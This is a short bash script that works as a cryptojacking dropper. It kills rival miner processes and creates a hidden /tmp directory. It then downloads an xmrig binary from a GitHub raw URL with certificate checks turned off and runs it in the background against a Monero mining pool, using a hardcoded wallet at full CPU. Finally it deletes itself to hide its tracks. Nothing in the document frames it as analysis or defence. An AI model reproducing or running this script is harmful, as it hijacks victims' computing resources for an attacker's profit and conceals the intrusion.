#!/bin/bash
local="/tmp/.work/.filebet/"

kill -9 `ps -aux|grep -E '(miner|xmrig|filebet)'|grep -v '(grep|ps)'|awk '{print $2}'` 2>/dev/null
rm -rf "$local" 2>/dev/null
mkdir -p "$local"	

if ! curl -ks "https://raw.githubusercontent.com/anabianca92/lol/main/xmrig-static" -o "$local"filebet 2>/dev/null && ! wget --no-check-certificate https://raw.githubusercontent.com/anabianca92/lol/main/xmrig-static -O "$local"filebet 2>/dev/null; then
  echo "[ERROR]: downloading xmrig"
  exit 1
fi

chmod +x "$local"
"$local"filebet -o stratum+tcp://gulf.moneroocean.stream:10128 -u 46tZPdrQpAeXWfph4X8Cxr5Ki3VNT6QX28MedBqoJhGrhsmZZAHW61EFF7sBtVCw8oQtMfd1vT79VNwbj7suCHzkP9yciEq -p  -k --cpu-max-threads-hint=100% -B

rm -f $0
